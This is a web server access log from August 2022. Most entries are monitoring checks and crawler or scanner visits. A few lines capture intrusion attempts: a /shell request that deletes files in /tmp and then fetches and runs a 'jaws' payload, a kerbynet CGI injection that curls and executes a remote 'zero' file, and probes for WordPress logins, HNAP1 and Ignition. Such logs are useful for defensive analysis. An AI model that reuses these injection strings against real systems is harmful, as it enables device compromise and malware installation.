195.56.55.225 - - [09/Aug/2022:07:02:39 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:07:04:44 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.7.214.104 - - [09/Aug/2022:07:05:59 +0200] "GET /console/ HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.56.55.225 - - [09/Aug/2022:07:06:48 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:07:08:52 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:07:10:55 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.249.83.44 - - [09/Aug/2022:07:12:25 +0200] "HEAD /maxigas/pick/painting/gargoyle-notre_dame.jpg HTTP/1.1" 404 0 "-" "FeedBurner/1.0 (http://www.FeedBurner.com)"
195.56.55.225 - - [09/Aug/2022:07:12:58 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
157.55.39.169 - - [09/Aug/2022:07:13:10 +0200] "GET /people.html HTTP/1.1" 404 288 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
66.249.83.48 - - [09/Aug/2022:07:13:15 +0200] "HEAD /maxigas/pick/painting/gargoyle-notre_dame.jpg HTTP/1.1" 404 0 "-" "FeedBurner/1.0 (http://www.FeedBurner.com)"
195.56.55.225 - - [09/Aug/2022:07:15:01 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
205.210.31.139 - - [09/Aug/2022:07:15:35 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
206.81.18.4 - - [09/Aug/2022:07:15:47 +0200] "HEAD / HTTP/1.1" 200 0 "https://www.bing.com" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.2 Safari/537.36"
206.81.18.4 - - [09/Aug/2022:07:15:47 +0200] "GET /wp-login.php HTTP/1.1" 404 291 "http://hosting2.deja.hu" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.2 Safari/537.36"
206.81.18.4 - - [09/Aug/2022:07:15:47 +0200] "GET /wordpress/wp-login.php HTTP/1.1" 404 301 "http://hosting2.deja.hu" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.2 Safari/537.36"
206.81.18.4 - - [09/Aug/2022:07:15:47 +0200] "GET /blog/wp-login.php HTTP/1.1" 404 296 "http://hosting2.deja.hu" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.2 Safari/537.36"
206.81.18.4 - - [09/Aug/2022:07:15:47 +0200] "GET /wp/wp-login.php HTTP/1.1" 404 294 "http://hosting2.deja.hu" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.2 Safari/537.36"
195.56.55.225 - - [09/Aug/2022:07:17:04 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:07:19:07 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
198.235.24.18 - - [09/Aug/2022:07:19:16 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [09/Aug/2022:07:21:10 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:07:23:15 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:07:25:18 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
198.235.24.9 - - [09/Aug/2022:07:26:27 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [09/Aug/2022:07:27:23 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:07:29:29 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
178.73.215.171 - - [09/Aug/2022:07:29:45 +0200] "GET / HTTP/1.0" 200 1155 "-" "-"
198.235.24.149 - - [09/Aug/2022:07:30:37 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [09/Aug/2022:07:31:32 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.249.64.80 - - [09/Aug/2022:07:33:23 +0200] "GET /robots.txt HTTP/1.1" 404 288 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.80 - - [09/Aug/2022:07:33:23 +0200] "GET /www.bicusa.org/publications.htm HTTP/1.1" 404 309 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)"
195.56.55.225 - - [09/Aug/2022:07:33:35 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:07:35:38 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:07:37:41 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:07:39:44 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:07:41:47 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
128.14.141.34 - - [09/Aug/2022:07:43:45 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
195.56.55.225 - - [09/Aug/2022:07:43:50 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.7.214.104 - - [09/Aug/2022:07:44:03 +0200] "GET /console/ HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
198.235.24.32 - - [09/Aug/2022:07:45:35 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
103.251.220.89 - - [09/Aug/2022:07:46:20 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+synss.cf/jaws;sh+/tmp/jaws HTTP/1.1" 404 277 "-" "Hello, world"
205.210.31.23 - - [09/Aug/2022:07:46:23 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [09/Aug/2022:07:46:37 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:07:48:40 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
205.210.31.130 - - [09/Aug/2022:07:50:35 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [09/Aug/2022:07:50:43 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:07:52:46 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
198.235.24.3 - - [09/Aug/2022:07:54:10 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [09/Aug/2022:07:54:50 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
205.210.31.133 - - [09/Aug/2022:07:55:09 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
114.119.149.237 - - [09/Aug/2022:07:56:19 +0200] "GET /robots.txt HTTP/1.1" 404 295 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
195.56.55.225 - - [09/Aug/2022:07:56:53 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:07:58:58 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:08:01:04 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:08:03:08 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:08:05:13 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:08:07:19 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:08:09:24 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:08:11:28 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:08:13:31 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:08:15:34 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:08:17:39 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
141.98.6.162 - - [09/Aug/2022:08:17:41 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
141.98.6.162 - - [09/Aug/2022:08:17:41 +0200] "POST /HNAP1/ HTTP/1.1" 404 282 "-" "Mozila/5.0"
195.56.55.225 - - [09/Aug/2022:08:19:42 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.7.214.104 - - [09/Aug/2022:08:19:58 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 305 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.56.55.225 - - [09/Aug/2022:08:21:46 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:08:23:50 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.249.89.14 - - [09/Aug/2022:08:24:26 +0200] "GET / HTTP/1.1" 304 - "-" "FeedFetcher-Google; (+http://www.google.com/feedfetcher.html)"
195.56.55.225 - - [09/Aug/2022:08:26:01 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:08:28:04 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:08:30:08 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.7.214.104 - - [09/Aug/2022:08:30:59 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 305 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
205.210.31.26 - - [09/Aug/2022:08:31:12 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
198.235.24.25 - - [09/Aug/2022:08:31:46 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [09/Aug/2022:08:32:11 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.7.214.104 - - [09/Aug/2022:08:33:00 +0200] "GET /_ignition/execute-solution HTTP/1.1" 404 302 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
205.210.31.130 - - [09/Aug/2022:08:33:23 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [09/Aug/2022:08:34:16 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
147.124.212.93 - - [09/Aug/2022:08:34:55 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0"
157.55.39.15 - - [09/Aug/2022:08:35:44 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
195.56.55.225 - - [09/Aug/2022:08:36:25 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:08:38:28 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:08:40:31 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:08:42:34 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
205.210.31.148 - - [09/Aug/2022:08:43:04 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [09/Aug/2022:08:44:37 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:08:46:40 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:08:48:44 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:08:50:54 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:08:52:57 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:08:55:00 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:08:57:04 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
154.16.192.252 - - [09/Aug/2022:08:57:06 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
195.56.55.225 - - [09/Aug/2022:08:59:10 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:09:01:20 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.249.83.44 - - [09/Aug/2022:09:02:49 +0200] "HEAD /maxigas/pick/painting/gargoyle-notre_dame.jpg HTTP/1.1" 404 0 "-" "FeedBurner/1.0 (http://www.FeedBurner.com)"
195.56.55.225 - - [09/Aug/2022:09:03:23 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.249.83.48 - - [09/Aug/2022:09:03:40 +0200] "HEAD /maxigas/pick/painting/gargoyle-notre_dame.jpg HTTP/1.1" 404 0 "-" "FeedBurner/1.0 (http://www.FeedBurner.com)"
210.13.110.60 - - [09/Aug/2022:09:04:00 +0200] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 404 276 "-" "-"
195.56.55.225 - - [09/Aug/2022:09:05:26 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:09:07:30 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:09:09:34 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:09:11:42 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.7.214.104 - - [09/Aug/2022:09:12:01 +0200] "GET /_ignition/execute-solution HTTP/1.1" 404 302 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
50.31.21.4 - - [09/Aug/2022:09:12:03 +0200] "GET / HTTP/1.0" 200 1155 "-" "-"
50.31.21.4 - - [09/Aug/2022:09:12:16 +0200] "GET /nmaplowercheck1660029135 HTTP/1.1" 404 300 "-" "Mozilla/5.0 (Linux; Android 7.1.2; LG-SP200) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.93 Mobile Safari/537.36"
50.31.21.4 - - [09/Aug/2022:09:12:16 +0200] "GET / HTTP/1.0" 200 1155 "-" "-"
50.31.21.4 - - [09/Aug/2022:09:12:16 +0200] "GET /evox/about HTTP/1.1" 404 286 "-" "Mozilla/5.0 (Linux; Android 7.1.2; LG-SP200) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.93 Mobile Safari/537.36"
50.31.21.4 - - [09/Aug/2022:09:12:16 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
50.31.21.4 - - [09/Aug/2022:09:12:17 +0200] "GET /HNAP1 HTTP/1.1" 404 281 "-" "Mozilla/5.0 (Linux; Android 7.1.2; LG-SP200) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.93 Mobile Safari/537.36"
50.31.21.4 - - [09/Aug/2022:09:12:17 +0200] "HEAD / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Linux; Android 7.1.2; LG-SP200) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.93 Mobile Safari/537.36"
50.31.21.4 - - [09/Aug/2022:09:12:17 +0200] "POST /sdk HTTP/1.1" 404 279 "-" "Mozilla/5.0 (Linux; Android 7.1.2; LG-SP200) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.93 Mobile Safari/537.36"
205.210.31.19 - - [09/Aug/2022:09:12:57 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [09/Aug/2022:09:13:47 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:09:15:50 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
205.210.31.28 - - [09/Aug/2022:09:16:30 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [09/Aug/2022:09:17:54 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
198.235.24.5 - - [09/Aug/2022:09:19:15 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [09/Aug/2022:09:20:01 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:09:22:04 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:09:24:08 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:09:26:12 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.249.64.83 - - [09/Aug/2022:09:27:12 +0200] "GET /www.bicusa.org/lac/idb/espan_putting.pdf HTTP/1.1" 404 318 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)"
195.56.55.225 - - [09/Aug/2022:09:28:18 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
54.36.148.121 - - [09/Aug/2022:09:28:56 +0200] "GET /robots.txt HTTP/1.1" 404 295 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
195.56.55.225 - - [09/Aug/2022:09:30:21 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:09:32:24 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:09:34:27 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
34.91.53.171 - - [09/Aug/2022:09:36:17 +0200] "GET /filmtext/2005-2006/Tavasz/Magyar4/jegkrembalett3.jpg HTTP/1.1" 404 329 "-" "Python-urllib/3.8"
34.91.53.171 - - [09/Aug/2022:09:36:17 +0200] "GET /filmtext/2005-2006/Tavasz/Magyar4/jegkrembalett2.jpg HTTP/1.1" 404 329 "-" "Python-urllib/3.8"
195.56.55.225 - - [09/Aug/2022:09:36:31 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
147.78.47.233 - - [09/Aug/2022:09:37:59 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/536.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763"
147.78.47.233 - - [09/Aug/2022:09:38:00 +0200] "GET /wp-login.php HTTP/1.1" 404 288 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763"
195.56.55.225 - - [09/Aug/2022:09:38:34 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:09:40:47 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
205.210.31.149 - - [09/Aug/2022:09:41:35 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [09/Aug/2022:09:42:50 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.7.214.104 - - [09/Aug/2022:09:44:29 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.56.55.225 - - [09/Aug/2022:09:44:59 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:09:47:02 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:09:49:07 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:09:51:11 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:09:53:14 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:09:55:18 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:09:57:21 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
198.235.24.158 - - [09/Aug/2022:09:59:20 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [09/Aug/2022:09:59:24 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
216.244.66.203 - - [09/Aug/2022:09:59:32 +0200] "GET /robots.txt HTTP/1.1" 404 283 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
27.227.253.160 - - [09/Aug/2022:10:00:25 +0200] "-" 408 - "-" "-"
195.56.55.225 - - [09/Aug/2022:10:01:27 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.7.214.104 - - [09/Aug/2022:10:02:39 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
216.244.66.203 - - [09/Aug/2022:10:02:42 +0200] "GET /maxigas/pick/painting/gargoyle-notre_dame.jpg HTTP/1.1" 404 318 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
66.249.83.46 - - [09/Aug/2022:10:03:02 +0200] "HEAD /maxigas/pick/painting/gargoyle-notre_dame.jpg HTTP/1.1" 404 0 "-" "FeedBurner/1.0 (http://www.FeedBurner.com)"
195.56.55.225 - - [09/Aug/2022:10:03:30 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.249.83.44 - - [09/Aug/2022:10:03:52 +0200] "HEAD /maxigas/pick/painting/gargoyle-notre_dame.jpg HTTP/1.1" 404 0 "-" "FeedBurner/1.0 (http://www.FeedBurner.com)"
195.56.55.225 - - [09/Aug/2022:10:05:33 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:10:07:40 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
31.56.10.242 - - [09/Aug/2022:10:08:39 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
195.56.55.225 - - [09/Aug/2022:10:09:49 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:10:11:53 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
77.88.5.2 - - [09/Aug/2022:10:13:38 +0200] "GET /robots.txt HTTP/1.1" 404 283 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
77.88.5.2 - - [09/Aug/2022:10:13:42 +0200] "GET /konzept.htm HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
195.56.55.225 - - [09/Aug/2022:10:14:01 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:10:16:08 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:10:18:11 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
